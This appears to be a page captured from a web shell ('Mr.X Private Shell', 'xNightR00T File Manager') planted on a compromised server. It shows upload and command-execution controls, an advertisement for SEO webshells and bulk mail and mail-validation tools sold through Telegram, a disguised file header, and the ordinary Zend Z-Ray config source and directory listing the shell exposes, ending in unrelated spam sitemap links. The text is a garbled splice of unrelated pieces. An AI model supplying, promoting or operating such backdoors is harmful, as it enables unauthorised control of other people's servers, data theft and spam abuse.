xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

use Zend\Config\Config;

define ('DS', DIRECTORY_SEPARATOR);

if (function_exists('zend_monitor_event_reporting')) {
	zend_monitor_event_reporting(0);
}

$appConfig = include_once 'config/application.config.php';

$currentConfig = new Config($appConfig);

// read 3rd party modules
if (file_exists('3rdparty/modules.config.php')) {
	$currentConfig->merge(new Config(include_once '3rdparty/modules.config.php'));
}

// add plugins folders
$zrayExtensions = array();
$zrayExtensionsPaths = array();
$zrayExtensionsDirs = array();
if (isAzureEnv() && ! isAzureDebugMode()) {
	$pluginsDir = dirname(getenv('ZEND_BIN_PATH')) . DS . 'plugins';
	if (file_exists($pluginsDir) && is_dir($pluginsDir)) {
		$zrayExtensionsDirs[] = new DirectoryIterator($pluginsDir);
	}
	
	if (file_exists('D:\home\data\zray\data\plugins') && is_dir('D:\home\data\zray\data\plugins')) {
		$zrayExtensionsDirs[] = new DirectoryIterator('D:\home\data\zray\data\plugins');
	}
} elseif (isZrayStandaloneEnv()) {
	$pluginsDir = getCfgVar('zend.data_dir') . DS . 'plugins';
	if (is_dir($pluginsDir) && is_readable($pluginsDir)) {
		$zrayExtensionsDirs[] = new DirectoryIterator($pluginsDir);
	}
} else {
	$zendDataDir = get_cfg_var('zend.data_dir') . DS . 'plugins';
	if (file_exists($zendDataDir) && is_dir($zendDataDir)) {
		$zrayExtensionsDirs[] = new DirectoryIterator($zendDataDir);
	}
}

// loop through plugins folder
/* @var \DirectoryIterator */
foreach ($zrayExtensionsDirs as $zrayExtensionsDir) {
	
	// loop through one plugin folder
	foreach ($zrayExtensionsDir as $extInfo) {
		if ($extInfo->isDot() || !$extInfo->isDir()) continue;
		
		if (!file_exists($extInfo->getPathname()) || !is_readable($extInfo->getPathname())) continue;
		
		// loop through the extension's folder
		$zrayExtensionsDirVersions = new DirectoryIterator($extInfo->getPathname());
		/* @var \DirectoryIterator */
		foreach($zrayExtensionsDirVersions as $fileinfo) {
			$extFolderPath = $fileinfo->getPathname();
			
			// check "zray" folder
			$zrayModulePath = $extFolderPath.DS.'zray';
			if (is_dir($zrayModulePath) && is_readable($zrayModulePath)) {
				if (file_exists($zrayModulePath.DS.'Module.php') && is_readable($zrayModulePath.DS.'Module.php')) {
					$namespace = getModuleNamespace($zrayModulePath);
					if ($namespace !== false) {
						// there's only one module
						$zrayExtensions[] = $namespace;
						$zrayExtensionsPaths[$namespace] = realpath($zrayModulePath);
					} 
				}
			}
			
			// check "ui" folder
			$uiModulesPath = $extFolderPath.DS.'ui';
			if (is_dir($uiModulesPath) && is_readable($uiModulesPath)) {
				// loop the "ui" folder for modules (probably there are several modules)
				foreach(scandir($uiModulesPath) as $uiModuleFolder) {
					if ($uiModuleFolder == '.' || $uiModuleFolder == '..') continue;
					
					$uiModulePath = $uiModulesPath . DS . $uiModuleFolder;
					$namespace = getModuleNamespace($uiModulePath);
					if ($namespace !== false) {
						$zrayExtensions[] = $namespace;
						$zrayExtensionsPaths[$namespace] = realpath($uiModulePath);
					}
				}
			}
		}
	}
}

// merge plugins modules
$currentConfig->merge(new Config(array('modules' => $zrayExtensions)));
$currentConfig->merge(new Config(array('module_listener_options' => array('module_paths' => $zrayExtensionsPaths))));

// @link ZSRV-14138
// Should be removed after we upgrade from 2.2.1
if (isset($_SERVER['HTTPS'])) {
	$_SERVER['HTTPS'] = strtolower($_SERVER['HTTPS']);
}

return $currentConfig->toArray();


// =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
// =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

/**
 * @brief Get module's namespace by reading its Module.php file
 * @param <unknown> $moduleFolderPath 
 * @return  
 */
function getModuleNamespace($moduleFolderPath) {
	if (!is_dir($moduleFolderPath) || !is_readable($moduleFolderPath)) {
		return false;
	}
	
	$modulePath = realpath($moduleFolderPath.DS.'Module.php');
	if (!file_exists($modulePath) || !is_readable($modulePath)) {
		return false;
	}
		
	// try to locate the namespace
	foreach (file($modulePath) as $line) {
		preg_match("/^namespace\s+(.*?)\s*;/", $line, $outputArray);
		if (count($outputArray) == 2) {
			return $outputArray[1];
			break;
		}
	}
	
	return false;
}

Filemanager

Name Type Size Permission Actions
3rdparty Folder 0755
config Folder 2775
data Folder 0755
lighttpd Folder 0755
module Folder 0755
public Folder 0755
tests Folder 0755
vendor Folder 0755
.tern-project File 159 B 0644
.zfproject.xml File 3.01 KB 0644
Gruntfile.js File 17.21 KB 0644
composer.json File 2.98 KB 0644
composer.lock File 164.9 KB 0644
init_application_config.php File 4.23 KB 0644
init_autoloader.php File 183 B 0644
package-lock.json File 250.15 KB 0644
package.json File 661 B 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml